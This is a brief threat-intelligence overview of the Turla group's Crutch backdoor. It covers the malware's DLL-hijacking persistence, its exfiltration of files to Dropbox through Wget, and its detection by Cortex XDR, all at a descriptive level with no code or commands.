Crutch

Crutch is a sophisticated malware attributed to the Turla group, first discovered by ESET researchers in December 2020. It's considered a second-stage backdoor, achieving persistence through DLL hijacking. One notable feature of Crutch v4 is its ability to automatically upload files found on local and removable drives to Dropbox storage using the Windows version of the Wget utility, differing from previous versions that relied on backdoor commands. Older iterations of Crutch included a backdoor that communicated with a hard-coded Dropbox account via the official HTTP API. The malware was detected and reported through the use of Cortex XDR, which raised both prevention and detection alerts. These alerts were not exclusive to Crutch but also encompassed other malware such as Capibar, Kazuar, Snake, QUIETCANARY/Tunnus, Kopiluwak, ComRAT, Carbon, HyperStack, and TinyTurla. The MITRE ATT&CK techniques, a globally-accessible knowledge base of adversary tactics and techniques, were utilized in the analysis and understanding of the Crutch attacks. In terms of mitigation, several measures have been put in place. Alerts for Crutch execution prevention and detection were displayed in Cortex XDR, indicating the system's capability to both identify and prevent the malware from carrying out its intended operations. This discovery underscores the importance of robust cybersecurity measures and the continued vigilance required to combat evolving cyber threats.